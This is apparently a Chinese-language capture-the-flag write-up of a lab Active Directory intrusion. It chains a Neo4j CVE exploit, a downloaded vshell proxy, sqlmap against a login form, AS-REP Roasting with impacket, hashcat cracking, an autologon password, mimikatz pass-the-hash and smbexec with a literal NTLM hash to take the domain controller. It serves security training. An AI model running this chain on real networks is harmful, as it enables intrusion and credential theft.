共计 1146 个字符,预计需要花费 3 分钟才能阅读完成。
渗透路径:
neo4j打CVE获得立足点->sqlmap梭出域环境账号->Kerberos AS-REP Roasting 攻击获取加密凭证->通过SIDHistory以及自动登录留下的凭证获取更高权限->pth拿下域控
还是端口扫描
打到一半重开了一下靶机所以,IP变了 39.98.109.138
观察靶机开放的端口,发现部署了neo4j。
看一下,很老的版本了。直接打CVE
https://github.com/zwjjustdoit/CVE-2021-34371.jar
java -jar ./rhino_gadget.jar rmi://靶机IP:1337 "命令"
直接就拿下flag了
python起个http服务然后下载vshell,方便起代理和交互
用stoaway也行,但是我懒
fscan传上去扫下内网
发现一个后台登录界面,直接SQLMAP跑一下试试
记得在conf文件里面配置代理
proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123"dump出flag和用户
竟然有一堆账号,然后就来打另一台Windows机器了
Kerberos AS-REP Roasting 攻击:这是一个针对 Kerberos 认证协议的攻击方法,主要目标是尝试从 Active Directory 获取不需要预身份验证的用户的加密凭证信息。这种攻击可以尝试暴力破解密码,特别是针对没有配置 Kerberos 预身份验证的用户账户。 proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/拿到NTML
使用hashcat爆破出密码
直接RDP远程连接上另一台主机
使用bloodhound做信息搜集
SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限
YUXUAN是自动登录用户
可以直接找到密码
我们可以通过他登录
用yuxuan@xiaorang.lab/Yuxuan7QbrgZ3L重连RDP
然后上传mimikatz打pth
获取了admin的hash后使用smbexec取得shell
proxychains4 python3 smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
然后继续pth拿下域控
